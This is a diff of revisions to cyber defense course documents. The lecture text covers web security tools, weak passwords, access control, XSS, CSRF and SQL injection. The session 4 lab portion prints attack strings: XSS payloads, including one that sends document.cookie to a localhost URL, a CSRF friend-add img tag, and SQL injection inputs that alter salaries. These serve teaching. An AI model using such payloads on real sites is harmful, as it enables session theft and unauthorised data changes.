-        <w:t>sophisticated</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> rules. Imperva WAF is a popular tool for this purpose. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">In </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">the </w:t>
-      </w:r>
-      <w:r>
-        <w:t>case of distributed denial of service attack</w:t>
-      </w:r>
-      <w:r>
-        <w:t>s,</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>even a WAF is not enough</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">. The problem is there </w:t>
-      </w:r>
-      <w:r>
-        <w:t>are</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> two kind</w:t>
-      </w:r>
-      <w:r>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> of bots - good bots and bad bots. </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Search engines deploy good bot</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">s like google, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>bing</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> etc. to crawl your site and index your pages for search results. </w:t>
-      </w:r>
-      <w:r>
-        <w:t>The hackers deploy bad bot</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">s. An </w:t>
-      </w:r>
-      <w:r>
-        <w:t>organization</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> should entertain good bots and block bad bots. This is hard to do. In those </w:t>
-      </w:r>
-      <w:r>
-        <w:t>cases,</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> tools are needed to identify the </w:t>
-      </w:r>
-      <w:r>
-        <w:t>signature</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> of the bad bots. Tools like Distill from Distill Network can be used to protect from bad bots. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Vulnerability Management</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Vulnerabilities of servers and networks pop up regularly. Companies need </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">a </w:t>
-      </w:r>
-      <w:r>
-        <w:t>tool to discover them, prioritize them and finally confirm that exposure has been remediated. Nexpose, Rapid7</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>is</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> vulnerability management software that monitors exposures in real-time and adapts to new threats with fresh data, ensuring you companies always act before the impact.</w:t>
+      <w:r>
+        <w:t xml:space="preserve"> that monitor exposures in real-time and adapt to new threats with fresh data, ensuring you companies always act before the impact.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4888,15 +4754,7 @@
         <w:t>ystem's security</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Netragard</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> is a popular pen</w:t>
+        <w:t>. Netragard is a popular pen</w:t>
       </w:r>
       <w:r>
         <w:t>-</w:t>
@@ -4950,7 +4808,28 @@
         <w:t>ing</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> company rectify security concerns to increase security rating.</w:t>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> compan</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ies</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">can </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">rectify security concerns to increase </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">their </w:t>
+      </w:r>
+      <w:r>
+        <w:t>rating.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4968,23 +4847,8 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">A honeypot is a computer intended to mimic likely targets of cyberattacks. It can be used to detect attacks or deflect them from a legitimate target. It can also be used to gain information about how cybercriminals operate. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ThreadStrike</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> from </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Attivo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> is a tool to set</w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t>A honeypot is a computer intended to mimic likely targets of cyberattacks. It can be used to detect attacks or deflect them from a legitimate target. It can also be used to gain information about how cybercriminals operate. ThreadStrike from Attivo is a tool to set</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
@@ -4999,48 +4863,62 @@
         <w:pStyle w:val="ListParagraph"/>
         <w:rPr>
           <w:b/>
+          <w:bCs/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
+          <w:bCs/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">This is the end of this course. It is an honor to work with you on such a complex topic as cyber defense. I hope we all learned </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>few</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t xml:space="preserve"> things and</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t xml:space="preserve"> are well equipped to</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t xml:space="preserve"> advance our knowledge </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>on the subject</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>. Thank you all.</w:t>
       </w:r>
@@ -5620,9 +5498,9 @@
             </wp:anchor>
           </w:drawing>
         </mc:Choice>
-        <mc:Fallback>
-          <w:pict>
-            <v:line w14:anchorId="130CE43D" id="Straight Connector 2" o:spid="_x0000_s1026" style="position:absolute;z-index:251660288;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:left;mso-position-horizontal-relative:page;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin" from="0,13.05pt" to="609pt,13.05pt" o:gfxdata="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" strokecolor="#0072c6 [3204]" strokeweight=".5pt">
+        <mc:Fallback xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+          <w:pict w14:anchorId="6687816B">
+            <v:line id="Straight Connector 2" style="position:absolute;z-index:251660288;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:left;mso-position-horizontal-relative:page;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin" o:spid="_x0000_s1026" strokecolor="#0072c6 [3204]" strokeweight=".5pt" from="0,13.05pt" to="609pt,13.05pt" w14:anchorId="130CE43D" o:gfxdata="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">
               <v:stroke joinstyle="miter"/>
               <w10:wrap anchorx="page"/>
             </v:line>

--- a/CD_Session4.docx
+++ b/CD_Session4.docx
@@ -96,7 +96,7 @@
         <w:t>"</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> protocol means all requests to and responses from the application </w:t>
+        <w:t xml:space="preserve"> protocol means all requests and responses from the application </w:t>
       </w:r>
       <w:r>
         <w:t>travel</w:t>
@@ -108,7 +108,13 @@
         <w:t>x</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">t. A </w:t>
+        <w:t xml:space="preserve">t. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Thus, a</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t>"</w:t>
@@ -161,7 +167,7 @@
         <w:t>"</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> protocol with a trust-worthy certificate.</w:t>
+        <w:t xml:space="preserve"> protocol with a trustworthy certificate.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -245,7 +251,13 @@
         <w:t xml:space="preserve">Many web applications </w:t>
       </w:r>
       <w:r>
-        <w:t>require users to login</w:t>
+        <w:t>require users to log</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>in</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">. For example, anybody can try to log on to </w:t>
@@ -292,13 +304,30 @@
         <w:t>o</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">n many websites for free. Anybody can try </w:t>
+        <w:t xml:space="preserve">n many websites for free. </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>So</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> a</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">nybody can try </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">to </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">login using these user ids and passwords. </w:t>
+        <w:t>log</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">in using these user ids and passwords. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -321,7 +350,13 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Demo: The demo application has very easy to guess passwords for </w:t>
+        <w:t>Demo: The demo application has very easy</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-to-</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">guess passwords for </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">the </w:t>
@@ -367,8 +402,13 @@
         <w:t xml:space="preserve"> named </w:t>
       </w:r>
       <w:r>
-        <w:t>David Kernell</w:t>
-      </w:r>
+        <w:t xml:space="preserve">David </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Kernell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -492,10 +532,13 @@
         <w:t xml:space="preserve"> answers to reset a password </w:t>
       </w:r>
       <w:r>
-        <w:t>remains</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> to be a </w:t>
+        <w:t>remain</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> a </w:t>
       </w:r>
       <w:r>
         <w:t>significant</w:t>
@@ -527,7 +570,15 @@
         <w:t>"</w:t>
       </w:r>
       <w:r>
-        <w:t>Which city were you born</w:t>
+        <w:t xml:space="preserve">Which city </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>were</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> you born</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> in</w:t>
@@ -671,7 +722,7 @@
         <w:t xml:space="preserve"> very strong. </w:t>
       </w:r>
       <w:r>
-        <w:t>I</w:t>
+        <w:t>Unfortunately, i</w:t>
       </w:r>
       <w:r>
         <w:t>f one of these sites is hacked, the user</w:t>
@@ -887,18 +938,18 @@
         <w:t>ve</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> access control that defines who can execute sensitive functions like create </w:t>
+        <w:t xml:space="preserve"> access control that defines who can execute sensitive functions like creat</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ing or deleting</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">a </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">user or delete </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">a </w:t>
-      </w:r>
-      <w:r>
         <w:t xml:space="preserve">user. Typically, these options are </w:t>
       </w:r>
       <w:r>
@@ -929,13 +980,19 @@
         <w:t>'</w:t>
       </w:r>
       <w:r>
-        <w:t>s never enough. In web application</w:t>
+        <w:t xml:space="preserve">s never enough. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>These functions are invoked via URLs in web application</w:t>
       </w:r>
       <w:r>
         <w:t>s</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">, these functions are invoked via URLs so anybody </w:t>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> so anybody </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">can type up the </w:t>
@@ -944,7 +1001,13 @@
         <w:t>URL</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> even when he/she does not have permission to execute the </w:t>
+        <w:t xml:space="preserve"> even when </w:t>
+      </w:r>
+      <w:r>
+        <w:t>they do</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> not have permission to execute the </w:t>
       </w:r>
       <w:r>
         <w:t>opera</w:t>
@@ -1040,7 +1103,13 @@
         <w:t>you</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> delete another record? But you are not logged in</w:t>
+        <w:t xml:space="preserve"> delete another record? </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Of course, b</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ut you are not logged in</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> as </w:t>
@@ -1184,8 +1253,13 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:t>W</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>So</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> w</w:t>
       </w:r>
       <w:r>
         <w:t>e will do this together as a team.</w:t>
@@ -1245,19 +1319,19 @@
         <w:t xml:space="preserve">code </w:t>
       </w:r>
       <w:r>
-        <w:t>instead of data. For example, in the First Name field, the hacker inputs a JavaScript</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> code</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> instead of his name. Now, </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">in </w:t>
-      </w:r>
-      <w:r>
-        <w:t>every place where the First Name is supposed to be displayed, the JavaScript is executed instead.</w:t>
+        <w:t xml:space="preserve">instead of data. For example, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>the hacker inputs a JavaScript code instead of his name in the First Name field</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. Now, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>the JavaScript is executed instead in every place where the First Name is supposed to be displaye</w:t>
+      </w:r>
+      <w:r>
+        <w:t>d.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1372,7 +1446,17 @@
         <w:ind w:firstLine="720"/>
       </w:pPr>
       <w:r>
-        <w:t>fun to hang out with &lt;script&gt;window.alert("You are hacked!")&lt;/script&gt;</w:t>
+        <w:t>fun to hang out with &lt;script&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>window.alert</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>("You are hacked!")&lt;/script&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1434,7 +1518,25 @@
         <w:pStyle w:val="ListParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>college student. &lt;script&gt;window.alert(document.cookie)&lt;/script&gt;</w:t>
+        <w:t>college student. &lt;script&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>window.alert</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>document.cookie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)&lt;/script&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1442,7 +1544,10 @@
         <w:ind w:left="720"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Now, all users viewing that profile or listing that profile will receive a JavaScript popup alert </w:t>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ll users viewing that profile or listing that profile will receive a JavaScript popup alert </w:t>
       </w:r>
       <w:r>
         <w:t>with the c</w:t>
@@ -1471,7 +1576,31 @@
         <w:ind w:left="720"/>
       </w:pPr>
       <w:r>
-        <w:t>&lt;I&gt; a cool duke&lt;/I&gt;&lt;script&gt;var image = new Image();image.src="http://localhost?myCookie=" + escape(document.cookie);&lt;/script&gt;</w:t>
+        <w:t xml:space="preserve">&lt;I&gt; a cool duke&lt;/I&gt;&lt;script&gt;var image = new </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Image(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>);</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>image.src</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>="http://localhost?myCookie=" + escape(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>document.cookie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>);&lt;/script&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1556,7 +1685,13 @@
         <w:t>"</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> where the hacker has your browser</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:t>he hacker has your browser</w:t>
       </w:r>
       <w:r>
         <w:t>'</w:t>
@@ -1613,11 +1748,16 @@
       <w:r>
         <w:t xml:space="preserve">t it? So, this is </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>some kind of</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> forgery. </w:t>
+        <w:t xml:space="preserve"> forgery</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">This </w:t>
@@ -1626,13 +1766,25 @@
         <w:t>type of attack</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> tricks a user </w:t>
+        <w:t xml:space="preserve"> tricks </w:t>
+      </w:r>
+      <w:r>
+        <w:t>users</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t>into executing</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> an unwanted operation on a web application that he/she is currently logged into.</w:t>
+        <w:t xml:space="preserve"> an unwanted operation on a web application that </w:t>
+      </w:r>
+      <w:r>
+        <w:t>they are</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> currently logged into.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1696,7 +1848,15 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">The page actually contains </w:t>
+        <w:t xml:space="preserve">The page </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>actually contains</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t>the following:</w:t>
@@ -1757,13 +1917,18 @@
         <w:pStyle w:val="CSBody"/>
       </w:pPr>
       <w:r>
-        <w:t>This is a welcome page from Bob</w:t>
-      </w:r>
-      <w:r>
-        <w:t>b</w:t>
-      </w:r>
-      <w:r>
-        <w:t>y's site. Thank you for visiting</w:t>
+        <w:t xml:space="preserve">This is a welcome page from </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Boby</w:t>
+      </w:r>
+      <w:r>
+        <w:t>'s</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> site. Thank you for visiting</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1771,7 +1936,15 @@
         <w:pStyle w:val="CSBody"/>
       </w:pPr>
       <w:r>
-        <w:t>&lt;img src="http://www.csrflabelgg.com/action/friends/add?friend=43"&gt;</w:t>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>img</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> src="http://www.csrflabelgg.com/action/friends/add?friend=43"&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1801,7 +1974,7 @@
         <w:t>,</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> and it is pointing to the other</w:t>
+        <w:t xml:space="preserve"> pointing to the other</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> application (</w:t>
@@ -1818,14 +1991,27 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:t>W</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>So</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> w</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">hoever </w:t>
       </w:r>
       <w:r>
-        <w:t>has the id 43 (Boby) will become Alice</w:t>
+        <w:t>has the id 43 (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Boby</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>) will become Alice</w:t>
       </w:r>
       <w:r>
         <w:t>'</w:t>
@@ -1882,7 +2068,18 @@
         <w:t>the</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> underlying database of the web application. You may ask</w:t>
+        <w:t xml:space="preserve"> underlying database of the web application. </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>But,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> y</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ou may ask</w:t>
       </w:r>
       <w:r>
         <w:t>,</w:t>
@@ -1900,7 +2097,13 @@
         <w:t>inputs</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> to go to the database without proper scrutiny. </w:t>
+        <w:t xml:space="preserve"> to go to the database without proper scrutiny.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> This is because</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">SQL (Structured Query Language) is the language </w:t>
@@ -1935,7 +2138,13 @@
         <w:t>d</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> procedure or prepared statement</w:t>
+        <w:t xml:space="preserve"> procedure</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> or prepared statement</w:t>
       </w:r>
       <w:r>
         <w:t>s</w:t>
@@ -1992,8 +2201,13 @@
         <w:ind w:firstLine="360"/>
       </w:pPr>
       <w:r>
-        <w:t>admin';#</w:t>
-      </w:r>
+        <w:t>admin</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>';#</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2003,7 +2217,13 @@
         <w:t>You will get a list of all the users on the system.</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> You have already executed a SQL injection and got results.</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>This is because y</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ou have already executed a SQL injection and got results.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2046,11 +2266,18 @@
       <w:r>
         <w:t xml:space="preserve">Time to </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>hack</w:t>
       </w:r>
-      <w:r>
-        <w:t>',salary=99999 where id=1;#</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>',salary</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>=99999 where id=1;#</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2058,7 +2285,6 @@
         <w:ind w:firstLine="360"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>Alice just got a big salary increase!</w:t>
       </w:r>
     </w:p>
@@ -2070,20 +2296,20 @@
           <w:numId w:val="46"/>
         </w:numPr>
       </w:pPr>
-      <w:r>
-        <w:t>Bob</w:t>
-      </w:r>
-      <w:r>
-        <w:t>b</w:t>
-      </w:r>
-      <w:r>
-        <w:t>y</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Boby</w:t>
       </w:r>
       <w:r>
         <w:t>'</w:t>
       </w:r>
       <w:r>
-        <w:t>s salary is currently 50,000</w:t>
+        <w:t>s</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> salary is currently 50,000</w:t>
       </w:r>
       <w:r>
         <w:t>,</w:t>
@@ -2102,22 +2328,32 @@
       <w:pPr>
         <w:ind w:firstLine="360"/>
       </w:pPr>
-      <w:r>
-        <w:t>',salary=salary-1 where id=2;#</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>',salary</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>=salary-1 where id=2;#</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="360"/>
       </w:pPr>
-      <w:r>
-        <w:t>Bob</w:t>
-      </w:r>
-      <w:r>
-        <w:t>b</w:t>
-      </w:r>
-      <w:r>
-        <w:t>y’s salary is now $</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Boby</w:t>
+      </w:r>
+      <w:r>
+        <w:t>'</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> salary is now $</w:t>
       </w:r>
       <w:r>
         <w:t>1 less, 49,999.</w:t>
@@ -2175,7 +2411,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">As we just saw, application code can be exploited </w:t>
+        <w:t xml:space="preserve">As we saw, application code can be exploited </w:t>
       </w:r>
       <w:r>
         <w:t>by</w:t>
@@ -2244,7 +2480,7 @@
         <w:t>ha</w:t>
       </w:r>
       <w:r>
-        <w:t>ve scripts that will attack an application and try to exploit weak passwords, cross-site scripting, SQL injection, etc</w:t>
+        <w:t>ve scripts that will attack an application and exploit weak passwords, cross-site scripting, SQL injection, etc</w:t>
       </w:r>
       <w:r>
         <w:t>.</w:t>
@@ -2481,7 +2717,15 @@
